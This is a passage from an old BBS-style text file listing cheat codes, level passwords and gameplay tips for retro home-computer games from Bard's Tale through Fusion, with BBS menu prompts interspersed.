up, left, up, left, left, right, + left three times, up, and left. Level 3: up, right, right, up, left, + right, up, right, left, left, up, left, left, up, up, right, right, + left, left, up. Level 4: hit the fireballs, then try to leap across. + Several low chops will destroy it. Next is the Pit Demon; when he + reaches out, use an overhead chop to hit his arms; repeat until death. + Next, Drax himself! Wait until he pauses between spells, and hit him + with a flying head chop! The End... + + + +Bards Tale I - Tales of the Unknown +------------------------------------------------------------------------------ +To get more gold than you will ever need (and then some), transfer all the +parties gold to one player. Save him to disk then load him back up and +transfer all to another. Keep repeating this process till you have done it +to all the players, then exit without saving. Load back up and all your +players will have the amount of gold equal to that of the entire party before. +Reapeat until satisfied. + +If your tired of waiting for morning to come enter and exit the guild. + + + +Bards Tale II - The Destiny Knight +------------------------------------------------------------------------------ +If your tired of waiting for morning to come enter and exit the guild. + +Find a band of illusionists and kill off the front line, have your castor +conjure DISRUPT ILLUSION, you will keep disbelieving and gaining expierence. + + + +Bards Tale III - The Thief of Fate +------------------------------------------------------------------------------ +For a bit of fun tell the guard at the Mad Gods temple HAMBURGER. + + + +Batman the Movie +------------------------------------------------------------------------------ +Type JAMMMM on the intro screen for infinite lives. Hit F10 after this to +skip levels. + + + +Battle Island +------------------------------------------------------------------------------ + 00 FIRST 16 CONRA 32 EUROP + 01 GHOST 17 PHASE 33 STORM + 02 GAMMA 18 EXOTY + 03 MARSS 19 MOUNT + 04 EAGLE 20 FIGHT + 05 METAN 21 RUSTY + 06 FOTON 22 FIFTH + 07 POLAR 23 VESUV + 08 TIGER 24 MAGIC + 09 SNAKE 25 SPACE + 10 ZENIT 26 VALEY + 11 DONNN 27 TESTY + 12 VESTA 28 TERRA + 13 OXXID 29 SLAVE + 14 DEMON 30 NEVER + 15 GIANT 31 RIVER + + + +Battle Squadron +------------------------------------------------------------------------------ +Type CASTOR for invulnerability. +Type ELECTRONIC on the intro to call up the game option editor. + + + +Battle Valley +------------------------------------------------------------------------------ +Type ROGER MELLIE THE MAN OF TELE to activate infinite lives. + + + +BBS Jane Seymour +------------------------------------------------------------------------------ +Level Codes: SLUMBER, INTEREST, BULKHEAD, SHOWROOM, MUSHBASH. + + + +Beach Volleyball +------------------------------------------------------------------------------ +DADDY BRACEY will activate level skips. Now hit F1 to skip levels. + + + +Batter Dead than Alien +------------------------------------------------------------------------------ +You can move your ship even when the games paused (ESC). + +To skip to the last level type QUARANTINE. + +Typing CHAMP then pressing HELP will show you the cheats available. + + Keys for cheating: F1 - Scatterbolts F6 - Neutron Bomb + F2 - Multi Fire F7 - Clone Ship + F3 - Auto Repeat F8 - Shield + F4 - Armour Missles F9 - Skip Level + F5 - Stun F0 - Extra Power Bars + +If you type in ELVIE or CHAMPIE, the program reports that the Super-Cheat +mode has been entered. + + Heres the codes: 001 - ELEKTRA 014 - TRIPTYCH + 002 - SYZYGY 015 - JABBERWOCKY + 003 - DRAMBUIE 016 - WHIMSICAL + 004 - PLUG 017 - CORNUCOPIA + 005 - SOPRANO 018 - PUNJABI + 006 - MAYONNAISE 019 - TIDDLY POM + 007 - FAUCET 020 - KEWPIE DOLL + 008 - POTATO 021 - SEPULCHRE + 009 - WOOMERA 022 - EUPHEMISM + 010 - NARCISSUS 023 - GRAMMARIAN + 011 - DEBUTANTE 024 - CROSSWORD + 012 - FIRKIN 025 - QUARANTINE + 013 - ACOUSTIC + + +Beverly Hills Cop +------------------------------------------------------------------------------ +On the screen displaying difficulty selection for the game type MELLIE so you +can have a bash at all the games. + + + +Beyond the Gates +------------------------------------------------------------------------------ +Entering THE END OF TIME DRAWS NEAR will call up a full character editor that +allows you to change your stats and add any item to your inventory. + + + +Bio-Challenge +------------------------------------------------------------------------------ +In game pressing ESC to pause the game and pressing G will transport you to +the end of level guardian. + +Hints for the first three levels: + + LEVEL 1: Get the green armous as soon as possible. If you have all + of the amulet, don't go to the sphere unless you have collected at + least four lots of monster remains, you'll need them to battle the end + of level guardian. He's a bit soft in the head, so time your jumps + carefully, and hit him there. + + LEVEL 2: There are four planets to visit, go to everyone if you + want to get maximum points. Again, the green armour is very useful, so + get it as quickly as possible. There's loads of ammo for the guardian + of this level, unfortunetly that means there's loads of monsters to + deal with. The back of the guardians head is the weak spot. + + LEVEL 3: Stand on the slabs and summersault. There are six planets + here, and the transporters are more difficult to so, so you have to + watch more carefully. + + + +Bionic Commando +------------------------------------------------------------------------------ +Exit from level 1 exactly when the timer reads 1 for nine lives and a super +high score. + + + +Blood Money +------------------------------------------------------------------------------ +Press HELP and then 1 or 2 and you will restock your supply of lives or money, +respectively. + + + +Bombuzul +------------------------------------------------------------------------------ +Actually there is a hidden pause control in the game. When you press the +spacebar to access the overhead map screen, if you keep it held down the clock +stops until you release it. + +When reaching a new level, it's worthwhile to sacrifice a life to see the +explosion pattern. When trying to detonate a pulsing bomb, pick it up; it's +easier to see its size. You are invulnerable to explosions when teleporting, +so use it to your advantage! A blind droid can't activate switches. Also, +here's a list of the level access codes: + + 008 - ROSS 096 - SONG 184 - PALM + 016 - RATT 104 - FIRE 192 - LOCK + 024 - LISA 112 - LAMP 200 - SAFE + 032 - DAVE 120 - TREE 208 - WORM + 040 - IRON 128 - SINK 216 - NOSE + 048 - LEAD 136 - BIKE 224 - EYES + 056 - WEED 144 - BIRD 232 - HAIR + 064 - RING 152 - TAPE 240 - SIGN + 072 - GIRL 160 - VASE 248 - MYTH + 080 - GOLD 168 - PILL + 088 - OPAL 176 - SPOT + + + +Brat +------------------------------------------------------------------------------ +The codes for The Brat: + 2 MIHEMOTO + 3 SASUTOZO + 4 SUMATZEE + 5 NOKITAGO + 6 ITSANONO + 7 MOZIMATO + 8 HOZITOMO + 9 MOKITEMO + 10 ZUMOHATO + 11 CHANASTU + 12 NAGAITSU + + + +Bubble Bobble +------------------------------------------------------------------------------ +If you can get to boards 10, 20, 30 & 40 without dying a door will appear +to take you to a secret level. On boards 7 & 22 wait a few seconds until the +umbrella falls and grab it, you will warp ahead 6 levels. + + F1 - advance 1 screen + F2 - advance 6 screens + F3 - advance 11 screens + + + +Builderland +------------------------------------------------------------------------------ +Level Codes: 1 - BUILD1 4 - OCTOPY + 2 - YOTTHA 5 - DIABLO + 3 - BEARBY 6 - GOTIUS +3 + +Cabal +------------------------------------------------------------------------------ +Type SCHLIKA during play. The border will flash and now F2 finishes the +level. + + + +Capone +------------------------------------------------------------------------------ +For invincibilty just shoot the top of the flag pole twice in front of the +post office. + + + +Captain Blood +------------------------------------------------------------------------------ +When you encounter a particularly friendly alien, ask it the follwing +question using the alien icons: CODE GG1. The alien will then give you the +coordinates of another alien called GG. Go to the specified planet and you +More[n,Y,=] can ask GG for the coordinates of all the other aliens around by asking CODE +INFORMATION HELP. If your met with blind ignorance then put in the name of +the alien after the HELP. + + + +Captive +------------------------------------------------------------------------------ +Combos for bases in Mission Two: + + Masgot..................TR,BL,TL,BR + Traphet.................TL,BL,TR,BR + Phoopel.................TL,TR,BL,BR + Sodcket.................BL,BR,TL,TR + Zaitet..................TL,BR,TR,BL + Quelosod................TL,TR,BL,BR + Saldet..................BL,TL,TR,BR + Mieusia.................TL,BLL,TR,BR + Pasdet..................TL,TR,BL,BR + Leatod..................BR,TR,TL,BL + + + +Carrier Command +------------------------------------------------------------------------------ +Type THE BEST IS YET TO BE with game paused and hit the + key on the numeric +keypad for near invincibilty. + +To take over the island in an action game, load up a Manta with two missles on +each side and three in the middle. Launch and fly to the opposite side of the +island, then fly in at top speed firing violently at the enemy command centre. +This will free the island and only take about thirty seconds. + + + +Car-Vup +------------------------------------------------------------------------------ +PUSSYCAT - 9 lives +BUMPER - Infinite car bumpers +ARNIECAR - 100,000 points +WOAARRGGH - Infinite fast turns +WHOOPSIE - Start at prehistoric stage + +But why not just type R.J.TOONE on the scores for infinites? + + + +Chamber of the Sci-Mutant Priestess +------------------------------------------------------------------------------ +You dont have to complete all five Ordeals. Instead, go into the tunnels +(from the Noose) and wait an hour. Then leave the tunnels and go to the +Masters Eye. Wait around until the master dies. Search his body for the +whistle. Use it and a panel will open up. Reach in and grab the egg. + + + +Champions of Krynn +------------------------------------------------------------------------------ +No use being repititous, check out the entry for Pool of Radiance for full +details on how to cheat this game. + + + +Chaos Strikes Back - Dungeon Master II +------------------------------------------------------------------------------ +Find a dragon and cast MON ZO GOR SAR and hit ESC to pause the game. Hold +down the ALT key and type in LORD LIBRASULUS SMITHES THEE DOWN. Unpause the +game and slay the beast. He leaves behind a firestaff and your party will be +invincible. + + + +Chariots of Wrath +------------------------------------------------------------------------------ +When it says to push the fire to start, push forward instead. + + + +Charly +------------------------------------------------------------------------------ + 2:ROOM 22:WORK 42:BANK + 3:CLAW 23:GLAS 43:BABY + 4:NEST 24:LOOP 44:STAR + 5:WORD 25:DARK 45:HINT + 6:FISH 26:ATOM 46:CHAT + 7:AUNT 27:TALK 47:FOUL + 8:RUSH 28:COAT 48:CALL + 9:TUBE 29:LOAD 49:LINE +10:RICH 30:LIFE 50:BEER +11:HAIR 31:PICK +12:SPOT 32:POST +13:NAME 33:RING +14:EDGE 34:GREY +15:DEEP 35:BEST +16:CASH 36:DEAD +17:SALT 37:KNOB +18:PACT 38:TASK +19:FIRE 39:BOSS +20:STAG 40:LAND +21:LEAP 41:FREE + + + +Chase H.Q. +------------------------------------------------------------------------------ +Hold the left mouse button and fire and type GROWLER. Press T for more time +now. Before each new level finishes talking hit space and use a free nitro. + +X & Z make steering easier. + +As soon as the title screen disappears start tapping the SPACEBAR at high +speed and continue until loading has finished and the game begins. Your car +will now have a top speed of over 1,000 km/h. + + + +Chase H.Q. II +------------------------------------------------------------------------------ +Type IN A GARDEN in title page and hit T to get more time. + +Hold down H and while the game is loading, now all the roadside obstacles +will dissapear. + + + +Chips Challenge +------------------------------------------------------------------------------ + 1: bdhp | 11: cnpe | 21: ugrw | 31: ryms | 41: gkwd + 2: jxmj | 12: wvhi | 22: wzin | 32: pefs | 42: lmfu + 3: ecbq | 13: ocks | 23: huve | 33: bqsn | 43: ujdp + 4: ymcj | 14: btdy | 24: uniz | 34: nqfi | 44: txhl + 5: tqkb | 15: cozq | 25: pqgv | 35: vdtm | 45: ovpz + 6: wnlp | 16: skkk | 26: yvyj | 36: nxis | 46: hdqy + 7: fxqo | 17: ajmg | 27: iggz | 37: vqnk | 47: lxpp + 8: nhag | 18: hmjl | 28: ujdd | 38: bifa | 48: jysf + 9: kcre | 19: mrhr | 29: qgol | 39: icxy | 49: ppxi + 10: vuws | 20: kgfp | 30: bqzp | 40: ywfh | 50: qbdh + -----------+------------+------------+------------+---------- + 51: iggj | 61: rmow | 71: lajm | 81: scwf | 91: jpqg + 52: ppht | 62: tigw | 72: ekft | 82: llio | 92: dtmi + 53: cgnx | 63: gohx | 73: qccr | 83: ovpj | 93: rekf + 54: zmgc | 64: ijpq | 74: mknh | 84: uveo | 94: ewcs + 55: sjes | 65: upun | 75: mjdv | 85: lebx | 95: bifq + 56: fcje | 66: zikz | 76: nmrh | 86: flhh | 96: wvhy + 57: ubxu | 67: ggja | 77: fhic | 87: yjys | 97: iocs + 58: yblt | 68: rtdi | 78: grmo | 88: wzyv | 98: tkwd + 59: bldm | 69: nlly | 79: jinu | 89: vczo | 99: xuvu + 60: zyvi | 70: gccg | 80: evug | 90: ollm | 100: qjxr + -----------+------------+------------+------------+---------- + 101: rpir | 111: krqj | 121: bpys | 131: fird | 141: mcje + 102: vddu | 112: njla | 122: sjum | 132: zyfa | 142: ucry + 103: ptac | 113: ptas | 123: ykze | 133: tigg | 143: okor + 104: kwnl | 114: jwnl | 124: tasx | 134: xpph | 144: gvxq + 105: yneg | 115: egrw | 125: myrt | 135: lywo | + 106: nxyb | 116: hxmf | 126: qrld | 136: luzl | + 107: ecre | 117: fpzt | 127: jmwz | 137: hppx | + 108: lioc | 118: oscw | 128: ftla | 138: lujt | + 109: kzqr | 119: phty | 129: hean | 139: vlhh | + 110: xbao | 120: flxp | 130: xhiz | 140: sjuk | + +Hit the F key in game to call up the cheat mode, you should have some idea +the cheat mode is activated because the screen flips upside down. + +SAGITTARIANS MAKE BETTER LOVERS - Infinte iceboots,keys, shield, mag. + I THINK THERFORE I AM - No chips needed + 09/12/57 - Infinite time + +Now you may press F to return to game or C to skip levels. + + + +Chop N Drop +------------------------------------------------------------------------------ +Push T while fighting and your guyz pants fall down. Press F and kick your +foe to see his do the same. Pressing S lets you change the color of shadows. + + + +Chubby Gristle +------------------------------------------------------------------------------ +On the title screen, type BUUURRP and have infinites + + + +Chuck Rock +------------------------------------------------------------------------------ +Hit ESC on the title page then type FAST AINT THE WORD or UNCLE SAMS or ITS +FAIRY BOWBELZ or SHE LOVES CLEANING WINDOWS or LIFE IS MY DREAM for infinite +energy. + +Select zones in levels by typing MORTIMER and use the F keys. Select levels +by typing TURN FRAME and 1-5 to go. Fly with ESTRANO. + +Turn on Caps Lock key. To select levels type TURN FRAME or TURN FRAME LEE +and use 1-5 to select. To be able to fly, type ESTRANO. Infinite energy +type UNCLE SAM. + + +Clown 'O Mania +------------------------------------------------------------------------------ +Press HELP for extras. + + + +Continental Circus +------------------------------------------------------------------------------ +When the first red light comes on push forward. As the second comes up +release. On green push forward. The faster the better. + + + +Cosmic Pirate +------------------------------------------------------------------------------ +To get to the cheat mode, press the spacebar to pause whilst you are playing +a game. Now press full stop while in pause mode. You will get a requester. +Type in GZAIMASEN and there should be a sound effect denoting cheat mode +operative. This will make you invincible. Once in cheat mode you can choose +which spacetruck to attck by recalling the requester and typing GIMMESHIPx +where 'x' is mission "A-Z'. This only works before entering the sector with +the spacetruck. + + + +Crackdown +------------------------------------------------------------------------------ +During play, pause the game and enter 'SMURF'. Pressing F1 and F2 will now +reimburse both player's lives. + + + +Crazy Cars II +------------------------------------------------------------------------------ +Here's a list of the roads you are supposed to take: + + Stage 1: take route 15 on your right, then route 70 on your left and + keep going. + Stage 2: take route 191 to your right, then route 666 on the left, and + then route 160 on your left and keep going. + Stage 3: take route 285 on the right and route 60 to your left. + Stage 4: take route 70 on the right, route 54 on the left, route 25 on + your right, route 10 to the left, and right on route 180. + + + +Crystal Hammer +------------------------------------------------------------------------------ +When starting hold down one mouse button. Click the other before the ball +appears on the paddle to start at level 26. + + + +Crystals of Arborea +------------------------------------------------------------------------------ +Go to the main character screen, select Jarel then click on the bottle icon. +Now press CTRL and V to get full life points plus all the special abilities. + + + +Curse of Ra +------------------------------------------------------------------------------ + LEVEL CODE LEVEL CODE LEVEL CODE + ----- ---- ----- ---- ----- ---- + 001 Wobbler 026 Thoron 051 64738 + 002 Yeg 027 Amarth 052 67802 + 003 Cthulhu 028 Thargelion 053 Nibelungen + 004 Lovecraft 029 Naugrim 054 Hagen von Tronje + 005 Tommyknockers 030 Meremont 055 Donar + 006 Watchers 031 Caerweddin 056 Skidbladnir + 007 Midgrad 032 Stahlratte 057 Dagon + 008 Unicorn 033 Mandelbrot 058 Slawotski + 009 Isis 034 von Koch 059 Cullinana + 010 Midnight 035 Christus 060 Arta Myrdhyn + 011 Kazgaroth 036 Jehova 061 Anna Magdalena + 012 Miscatonic 037 92E2JMP92E2 062 Phillip Emanuel + 013 Thorbadin 038 Rawheadrex 063 Graceland + 014 Mishakal 039 Hellraiser 064 Solly Roger + 015 Abanasinia 040 Pinhead 065 Get Funky + 016 Earthmother 041 Devpac 066 Twilight + 017 Azatoth 042 Einsteinium 067 Dragonlance + 018 Akallabeth 043 Protactinium 068 Hathega Kla + 019 Silmarillion 044 Promethium 069 Inquanok + 020 Draug 045 JS Bach 070 Kiran + 021 Sindarin 046 Toccata Et Euga 071 Oukranos + 022 Ossiriand 047 Brandenburg 072 Thran + 023 Mithril 048 Colonia Claudia 073 Ulthar + 024 Glaurung 049 Volksgarten 074 Thalarion + 025 Elbereth 050 Terra 075 Ngranek + + LEVEL CODE + ----- ---- + 076 Chathuria + 077 Entropie + 078 Heissenberg + 079 Laplace + 080 Sona Nyl + 081 Differential + 082 Integral + 083 Hyperzyklus + 084 Apfel Mann + 085 Chaos + 086 Dyakhee + 087 Dendrit + 088 Neuron + 089 Dankreas + 090 Panakrea + 091 Unordnung + 092 Deutschland + 093 Germany + 094 Music Television + 095 John Belushi + 096 Rhythm N Blues + 097 Gleichrichter + 098 Translation + 099 Cthuga + + + +Curse of the Azure Bonds +------------------------------------------------------------------------------ +No use being repititous, check out the entry for Pool of Radiance for full +details on how to cheat this game. + + + +Cybernoid +------------------------------------------------------------------------------ +At the front screen type RAISTLIN and hit SPACE for infinites. Press N to +skip levels. + +Or, try defining your keys as Y X E S (in that order) for unlimited ships. + + + +Cybernoid II +------------------------------------------------------------------------------ +Type NECRONOMICON on the intro screen. Press N to skip levels. If you +define the keys as Y G R O (in that order) you get infinites. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 4 + +Daley Thompson Olympic Challenge +------------------------------------------------------------------------------ +To begin each level with 3 full cans of Lucozade, get on to the high-score +table, and type HINGSEN-J in place of your name, followed by a quick press of +the DEL key. The high-score table will now be titled DEMO, so type in -J +again, which will change the title to MEGA DEMO. Now restart the game, and +press any of the F keys to choose an event to play with a full quota of +Lucozade. + + + +Damocles +------------------------------------------------------------------------------ +On Midas reference 577-341 you can find a pyramid which contains a magic +crystal. To use it, you'll need the book from the trader at Eris Capital City +(13-5). Reading the book while in possession of the crystal will allow one +wish to be granted. You may like to try some of the following wishes. + + I WISH I HAD A CHEESE SANDWICH +More[n,Y,=] I WISH I HAD MORE TIME + I WISH I COULD RECIEVE 1,000,000 CREDITS + I WISH THE UNIVERSE WAS MORE COLOURFUL + I WISH I KNOW HOW TO USE AUTHOR'S COMPUTER + I WISH I HAD MERCENARY 3 NOW + + + +Darkside +------------------------------------------------------------------------------ +Hold down 2 and 8 then press fire for pics of the programmers. + + + +Datastorm +------------------------------------------------------------------------------ +Hit F10 on the brag screen for some messages. + + + +Death Knights of Krynn +------------------------------------------------------------------------------ +No use being repititous, check out the entry for Pool of Radiance for full +details on how to cheat this game. + + + +Denaris +------------------------------------------------------------------------------ +Press Z, plug mouse in port 2, hold right button as loads. + + + +Defender of the Crown +------------------------------------------------------------------------------ +While loading, hold down K for 1,024 knights in your army and castle. Only +works on some versions. + +If you begin the game at the lowest castle, move all your men in your army and +take the 3 high vassal/income territories below. This will give you a lot of +men in your army. Move back to your castle ad you will also be able to buy +lots of men. + +When sword fighting move forward, backward, strike, and repeat, you should +beat your opponents with no problems. + +Move your lance until it is just left of your opponents shield, then down a +little. Count the number of bounces and on the 5th strike at the lowest +possible point. + + + +Defender II +------------------------------------------------------------------------------ + GOATY - Invincibility is yours + RAVEN - Activates these keys for play; + I - Invincibility on/off + N - Next level + D - Fly auto-pilot 23 levels + INCAS - Replaces inviso with smart laser in Stargate + ANDES - Power is restored every time laser is fired + + Passwords; + 1) START 5) FLOYD 9) FURRY 13) BEAST 17) LEMAC + 21) ZIPPO 25) LASER 29) DEFAD 33) MAGOG 37) FUNKY + 41) DONKY 49) KANJI 53) IRATA 57) NEURO 61) STOAT + + + +Dogs of War +------------------------------------------------------------------------------ +Type TIMBO then hit F5 for invincibility. + + + +Dominator +------------------------------------------------------------------------------ +Type SHAFT on the hi score table for infinite lives. + + + +Double Dragon +------------------------------------------------------------------------------ +Play the two player game and get both players killed until you have one credit +left and the CONTINUE message is displayed on both sides of the screen. Press +both fire buttons simultaneously for infinites. + +Or try typing R U CALLING MY PINT A POFF! on the title screen and you can kill +every opponent by pressing the DELETE kill. + +When the title screen pops up, type the followings: LEVEL ONE PLEASE (start +on level one), LEVEL TWO PLEASE (start on level two), and so on until level +four, THE LAST LEVEL PLEASE drops you on the last level, GIVE ME MORE HEALTH +PLEASE (lots of energy!), I DO NOT WANT TO DIE (invincibility!). Just +remember to say please!!! Also, type Neil Harding in the high-score list +and something funny happens... + + + +Dr Plummet +------------------------------------------------------------------------------ +F1 skips to next level, F2 for invincibility, F10 resets fuel & ships. + + + +Dragon Breed +------------------------------------------------------------------------------ +Pause game and type IREM, N will skip level. + + + +Dragon Ninja +------------------------------------------------------------------------------ +Type TERRIFIC during the game. Pressing L now advances the game to the next +level, and F3 gives you infinite lives. + + + +Dragon Lord +------------------------------------------------------------------------------ +A nice spell to know is this Dragon Spell: + + 3 Rasgon (grind) (full heat) + 3 Haloros (cut) (full condenser) + 3 IGELE (normal) (full heat) (medium condenser) + 2 Rasgon (grind) (full heat) + + + +Dragon Scape +------------------------------------------------------------------------------ +Press TAB then hit 2 for warps to the next level. + + + +Dragon Spirit +------------------------------------------------------------------------------ +Hit F9 to pause the game then type DRAGON HEAD and then F10. + + + +Dragon Wars +------------------------------------------------------------------------------ +You can multi-task Dragon Wars by typing CHANGETASKPRI -1 in CLI. Hitting +Amiga-E jumps to the games ending. + + + +Dragons Lair +------------------------------------------------------------------------------ +To watch the game demo press all these at once ESC R/LN7. Then press fire. + + + +Dragons Lair - Singes Castle +------------------------------------------------------------------------------ +You can play easy mode and still see all the screens, like so; + +Select the hardest possible setting before starting the game,including +disabling flip screen and choosing only 3 lives. Now click on the game icon +and do as if you were to start the game. When you are prompted to click to +play, just choose exit. Now select easy mode and more lives and away you go. + + + +Dragons Lair II - Time Warp +------------------------------------------------------------------------------ +Hammer GET MORDROC DIRK at any time to see the game played to the end, much +easier than playing yourself, and more exciting to boot. + + + +Drakkhen +------------------------------------------------------------------------------ +For a better character: + +Get into the character generator section, and enter the character name as +31415927. Then when you are next asked for your name, enter SUPERVISOR. Now +play the game and press CONTROL. When a monster appears, quicly hit RETURN. +You will do a half turn, take advantage of this and run away. + +All armour, weapons and treasure inside palaces is restocked when you enter. +You can hit the palace, load up, get out, and sell it off for quick cash, +repeat as often as you need. + +Get all the expirence points you want by going to Prince Haagkens castle. +Make your way past the bats, past the first fireplace with the trap to the +second fireplace. In front of the fireplace is a switch that activates a door +two or three rooms farther on in the castle when you step on it. This door +leads to a water fountain. Looking into the fountain transports you to a room +filled with water that has a never ending supply of water monsters. Take your +best weapon and armour with you. Set your character on 'auto kill' and if he +or she is able to hang in there, you can leave the character in the room for +several hours or all night killing off zillions of monsters. Do this for each +of your characters and youll easily be able to kill the giant dragon. + + + +Driller +------------------------------------------------------------------------------ +Upon starting the game you will be facing a small shed. Just shoot it around +20 times and you will be transformed into a jet. + + + +Drivin Force +------------------------------------------------------------------------------ +Click on the both of the 'i' in DRIVIN at main and during the game you cant +leave the track. + + + +Dungeon Master +------------------------------------------------------------------------------ +To see someone interesting face the entrance and cast OH EW RA. To advance +ninjas have them stand in a hall and throw weapons. Retrieve and repeat. +Magic Users should cast spells in the air and fighters just slash at empty +space. + +For a bit of nastiness, return to the entrance with the Firestaff, but leave +the power gem behind. + +Halk isnt as bloody stupid as you think, give him magic objects and he will +gain enough spell points to cast LO. Have him keep casting this and his magic +powers will develope. + + Here are some undocumented spells: + + YA BRO ROS - Leaves a trail of footprints + VI BRO - Shield poison + DES IR SAR - Darkness + FUL BRO NETA - Fire ball shield + OH KATH RA - Lightning Bolt + d ZO - Open doors + DES EW - Weakens non-corperal (undead) beings + + + +Dynamite Dux +------------------------------------------------------------------------------ +Type CHEAT to do so. Hit F1-F6 for level skips. Type NUDE to box. + + + +Dynasty Wars +------------------------------------------------------------------------------ +At the title type CHEAT MODE and hit F2 to skip levels. + + + +Dyter-07 +------------------------------------------------------------------------------ +When the game loading screen appears, type in GIBB. This activates the cheat +mode. When W is pressed you get extra weaponry and when S is pressed your +shields are replinished. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 5 + +E-Motion +------------------------------------------------------------------------------ +When the title screen appears type in MOONUNIT and press RETURN. Now start +the game as usual. + + F1 - skip levels F3 - Skip 10 levels + F2 - Go back a level F4 - Go back 10 levels + + + +E-Swat +------------------------------------------------------------------------------ +Pause and type JUSTIFIED ANCIENTS OF MUMU for 99 credits. + + + +Ed the Duck +------------------------------------------------------------------------------ +If you are stuck on a particular level and can't get off, press the left mouse +More[n,Y,=] button to advance you to the next level. + + + +Elephant Antics +------------------------------------------------------------------------------ +Type ITCHY ARSEHOLES on the titles page for infinites. + + + +Elf +------------------------------------------------------------------------------ +CHOROPOO to cheat while playing. + + + +Eliminator +------------------------------------------------------------------------------ +Press HELP on the title page and type in the required code to start the new +level. + 02 - AMEOBA 09 - HANDEL + 03 - BLOOOP 10 - ICICLE + 04 - CHEEKI 11 - JAMMIN + 05 - DOINOK 12 - KIKONG + 06 - ENIGMA 13 - LAPDOG + 07 - FLIPME 14 - MIKADO + 08 - GEEGEE + + + +Elite +------------------------------------------------------------------------------ +When the title screen with the rotating ships appear press A. This will stop +the ship from moving. To move or rotate the ship, press the arrow keys, and +to get more rotations hold down the A key while pressing an arrow key. To +move the ship toward or away from you press O or I . Press D when your +finished. Press W while flying to tell your score and the authors credits. + +Type SARA as your password and hit RETURN. Get to the hack screen by pressing +* on the numeric keypad. + + + +Empire Strikes Back +------------------------------------------------------------------------------ +Hold down the HELP key and type XIFARG ROTKEV. You can now use the number +keys to play the sampled speech and L, C, & D to bring up pictures of Luke, +C3PO & Darth Vader. + + + +Enchanted Lands +------------------------------------------------------------------------------ +Type TCB RULES FOREVER on the intro screen and the screen will flash. +Pressing F3 will allow you to enter an edit. Pressing F2 followed by a space +will take you to the end of level guardian. + + + +Enduro Racer +------------------------------------------------------------------------------ +After the countdown type CHEAT. Now you can: + + T - Extra 10 seconds + S - Advances one checkpoint + F - Turbo speed (210kmh) + + + +Enlightenment - Druid II +------------------------------------------------------------------------------ +To find secret levels at the start of the game immediately go left to the +desert, then continue left to the fire zone. Head to the upper most left +corner of this area and you should see lava with a patch on it that looks +like a section of the Firewall spell. As quickly as you can, walk on this +patch and you will be whisked away to secret levels. + + + +Escape from the Planet of the Robot Monsters +------------------------------------------------------------------------------ +This only works in one player mode. When you reach the reptillion, run past +it and stand in the center of the joint of the gates that block your way. +When here waggle the joystick left and right and keep dropping bombs. In a +few moments you'll go through the doors and appear on the other side. + + + +Executive Leader Board +------------------------------------------------------------------------------ +Use a 6I on the 7th hole and you can get a hole in one every time. + + + +Exolon +------------------------------------------------------------------------------ +Type AD ASTRA on the high score table for infinite lives. + + + +Eye of the Beholder +------------------------------------------------------------------------------ +Make two copies of Disk 2 then make up your parties on both disks. Play the +game as usual, but when you find any secret passages or walls, or unlock any +doors, insert the other disk and continue playing for a short while. This +passes all the data onto this disk. Replace the original disk and continue +playing and now, if you get stuck in the game and you have to start again, +simply continue with the other disk and all the doors that were previously +locked will be open. Plus, you'll be able to pick up the keys that you +needed to unlock them as a bonus! + + + +Eye of Horus +------------------------------------------------------------------------------ +After PRESS FIRE TO START appears type SPAM for invincibilty and you also +wont need to find colord keys to operate elevators. + +Enter item#, Scan, Quit, ?=Menu + +Game Cheats> 6 + +F-29 Retaliator +------------------------------------------------------------------------------ +Choose DIDYMEN for your name, click COLONEL icon and hit RETURN. + + + +FA-18 Interceptor +------------------------------------------------------------------------------ +Taxi down US 101, turn right at Highway 92, pull up to the EA HQ and blow it +away. + +In mission 6. once you've fired all your missles, you can land on the Shadow +Sub and it will refuel and re-arm you. + + + +Faery Tale Adventure +------------------------------------------------------------------------------ +In the dungeons and cave you can go through opening doors, restore your +More[n,Y,=] position and you will still have all your keys. Repeat as often as you need. + +Go to the dark evil castle. Stand right up against the force field. Let +yourself starve so that you faint. When you wake up, you'll be on the other +side of the forcefield. + +Find the green turtle, jump on his back and start attacking. Nothing will +happen except your bravery points will keep piling up. + +On the Crystal Castle Island press right mouse button while speaking with the +Sorceress and luck increases to 65. ASK the Sorceress several times. + +A secret entrance to the fort exists. On the left side, near even with the +door. + +Save a game to a back up file and patch byte 18 to a non-zero value and you +know have these cheats at your disposal: + + ARROW KEYS - Move very fast over any terrain + B - Summon Gold Swan + R - Rescue Princess + = - Display Coordinates + F9 - Increase time by one hour + F10 - Location in coordinates + + + +Falcon +------------------------------------------------------------------------------ +CONTROL X will rearm your weapons. + + + +Fernandez Must Die! +------------------------------------------------------------------------------ +Pause and type SPINYNORMAN and you get infinites. + + + +Fighter Bomber +------------------------------------------------------------------------------ +BUCKAROO for your name and the Amiga speaks to you, then lets you access all +16 missions. + + + +Flood +------------------------------------------------------------------------------ +Here are the codes for the first 42 levels: + + 01 - FROG 08 - GRIP 15 - FOUR 22 - REED 29 - LOOP 36 - BRIL + 02 - YEAR 09 - TRAP 16 - GRIT 23 - LIME 30 - SING 37 - EGGS + 03 - QUIF 10 - THUD 17 - ZING 24 - QUID 31 - JOUX 38 - HENS + 04 - LONG 11 - FRAK 18 - JING 25 - WING 32 - PINK 39 - HAIL + 05 - WORD 12 - VINE 19 - LIDO 26 - FLEE 33 - GOGO 40 - SOAP + 06 - FRED 13 - UMP 20 - POOL 27 - GIGA 34 - LETS 41 - FOAM + 07 - WINE 14 - NILL 21 - HATE 28 - HEAD 35 - QUAD 42 - MEEK + + + +Flying Shark +------------------------------------------------------------------------------ +On the high score screen enter HSC or KDJ for infinite lives or invulnerablity +respectively. + + + +Footman +------------------------------------------------------------------------------ +In the first maze of New Taste you can hide from the ghosts and collect points +from the fruit that emerges periodically, if you go to the upper left corner +entrance to the tunnel. + + + +Forgotten Worlds +------------------------------------------------------------------------------ +Type ARC at the front screen then hit HELP. Now press S in game to auto enter +the shops, and N will skip levels. + + + +Full Contact +------------------------------------------------------------------------------ +In single player mode type: QAZWXEDCRFVTGBYHNUJM (you must not press the S key +when you type in this sequence of diagonal keys on keyboard. + + + +Fusion +------------------------------------------------------------------------------ +Press ESC to quit, then E and you can skip levels by using + and -. Same can +be achieved by typing SWAMP THING at the brags. To jump right into the editor +push diagonaly up/left, fire, then E. + +Start the game as normal, collect the ship and fly to the extreme top left of +the playing area. Disembark from the ship and drive the buggy into the +corner. Type in STONKER and re-enter the ship. Now pressing D cycles through +the available weapons (including shield plus weapons), and pressing C cycles +through the levels. 